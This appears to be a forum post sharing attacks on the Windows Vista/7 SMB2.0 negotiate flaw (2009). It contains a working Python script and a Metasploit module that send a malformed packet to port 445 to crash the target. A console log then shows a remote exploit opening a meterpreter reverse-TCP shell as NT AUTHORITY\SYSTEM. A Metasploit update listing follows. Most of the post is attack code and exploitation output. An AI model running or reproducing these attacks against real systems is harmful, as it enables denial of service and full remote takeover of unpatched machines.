Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

#!/usr/bin/python #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary:: Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Vista SMB 0-day DoS 'Description' => %q{ This module exploits an "unknown" vulnerability in the SMB service on windows. (port 445) Ported by MaXe <a href="mailto:security@intern0t.net">security@intern0t.net</a> }, 'Author' => [ 'MaXe, credits to: Laurent Gaffié' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'url', 'http://pentestit.com/2009/09/08/windows-vista-smb-remote-request-day' ], ], 'DisclosureDate' => 'Sep 08 2009 register_options( [ Opt::RPORT(445), ], self.class) end def run connect buf1 = "\x00\x00\x00\x90" buf2 = "\xff\x53\x4d\x42" buf3 = "\x72\x00\x00\x00" buf4 = "\x00\x18\x53\xc8" buf5 = "\x00\x26" dos = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00" sploit = buf1 sploit << buf2 sploit << buf3 sploit << buf4 sploit << buf5 sploit << dos sock.put(sploit) disconnect end end

holiganvn@holiganvn:~$ msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ msf v3.3-dev + -- --=[ 402 exploits - 248 payloads + -- --=[ 21 encoders - 8 nops =[ 182 aux msf> use exploit/windows/smb/smb2_negotiate_func_index msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp msf (exploit/smb2) > set LHOST 192.168.0.136 msf (exploit/smb2) > set LPORT 5678 msf (exploit/smb2) > set RHOST 192.168.0.211 msf (exploit/smb2) > exploit [*] Started reverse handler [*] Connecting to the target (192.168.0.211:445)... [*] Sending the exploit packet (854 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Sending stage (719360 bytes) [*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158) meterpreter > sysinfo Computer: WIN-UAKGQGDWLX2 OS : Windows 2008 (Build 6001, Service Pack 1). Arch : x86 Language: en_US meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

holiganvn@holiganvn:/opt$ su root
Password: 
root@holiganvn:/opt# cd /opt
root@holiganvn:/opt# ls
lampp  metasploit  nessus  ruby
root@holiganvn:/opt# cd metasploit
root@holiganvn:/opt/metasploit# ls
framework3
root@holiganvn:/opt/metasploit# cd framework3
root@holiganvn:/opt/metasploit/framework3# ls
data           modules     msfelfscan   msfopcode   msfrpcd  scripts
documentation  msfcli      msfencode    msfpayload  msfweb   tools
external       msfconsole  msfgui       msfpescan   plugins
lib            msfd        msfmachscan  msfrpc      README
root@holiganvn:/opt/metasploit/framework3# svn update
....
U    modules/exploits/windows/lpd/wincomlpd_admin.rb
A    modules/exploits/windows/http/adobe_robohelper_authbypass.rb
U    modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb
U    modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
U    modules/exploits/windows/browser/apple_quicktime_rtsp.rb
U    modules/exploits/windows/browser/macrovision_unsafe.rb
U    modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
U    modules/exploits/windows/browser/winzip_fileview.rb
U    modules/exploits/windows/browser/ie_unsafe_scripting.rb
U    modules/exploits/windows/browser/owc_spreadsheet_msdso.rb
U    modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb
U    modules/exploits/windows/browser/symantec_appstream_unsafe.rb
A    modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
U    modules/exploits/windows/browser/ie_createobject.rb
U    modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
U    modules/exploits/windows/browser/autodesk_idrop.rb
A    modules/exploits/windows/nfs
A    modules/exploits/windows/nfs/xlink_nfsd.rb
U    modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
A    modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
U    modules/exploits/windows/fileformat/videolan_tivo.rb
U    modules/exploits/windows/ftp/sasser_ftpd_port.rb
A    modules/exploits/windows/ftp/xlink_client.rb
U    modules/exploits/windows/ftp/warftpd_165_pass.rb
U    modules/exploits/windows/ftp/freeftpd_user.rb
U    modules/exploits/windows/ftp/proftp_banner.rb
U    modules/exploits/windows/ftp/warftpd_165_user.rb
U    modules/exploits/windows/ftp/wsftp_server_503_mkd.rb
A    modules/exploits/windows/ftp/xlink_server.rb
U    modules/exploits/windows/driver/dlink_wifi_rates.rb
A    modules/exploits/windows/motorola
A    modules/exploits/windows/motorola/timbuktu_fileupload.rb
U    modules/exploits/windows/vpn/safenet_ike_11.rb
U    modules/exploits/windows/smb/smb_relay.rb
U    modules/exploits/windows/smb/psexec.rb
A    modules/exploits/windows/smb/smb2_negotiate_func_index.rb
U    modules/exploits/windows/iis/ms01_023_printer.rb
U    modules/exploits/windows/imap/mercury_rename.rb
U    modules/exploits/windows/imap/mdaemon_fetch.rb
U    modules/exploits/windows/brightstor/universal_agent.rb
A    modules/exploits/windows/misc/bigant_server_250.rb
U    modules/exploits/windows/misc/fb_svc_attach.rb
U    modules/exploits/windows/misc/ib_svc_attach.rb
A    modules/exploits/windows/misc/sap_2005_license.rb
U    modules/exploits/windows/misc/fb_isc_create_database.rb
U    modules/exploits/windows/misc/fb_isc_attach_database.rb
U    modules/exploits/windows/misc/ib_isc_create_database.rb
U    modules/exploits/windows/misc/ib_isc_attach_database.rb
U    modules/exploits/windows/misc/videolan_tivo.rb
U    modules/exploits/windows/misc/eiqnetworks_esa.rb
U    modules/exploits/windows/ssh/putty_msg_debug.rb
U    modules/exploits/windows/mssql/ms02_056_hello.rb
U    modules/exploits/windows/oracle/tns_service_name.rb
U    modules/exploits/windows/oracle/tns_arguments.rb
U    modules/exploits/windows/firewall/kerio_auth.rb
...
Updated to revision 7123.

root@holiganvn:~$ msfconsole _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| =[ msf v3.3-dev [core:3.3 api:1.0] + -- --=[ 412 exploits - 261 payloads + -- --=[ 21 encoders - 8 nops =[ 191 aux

Users currently in here

1 Anonymous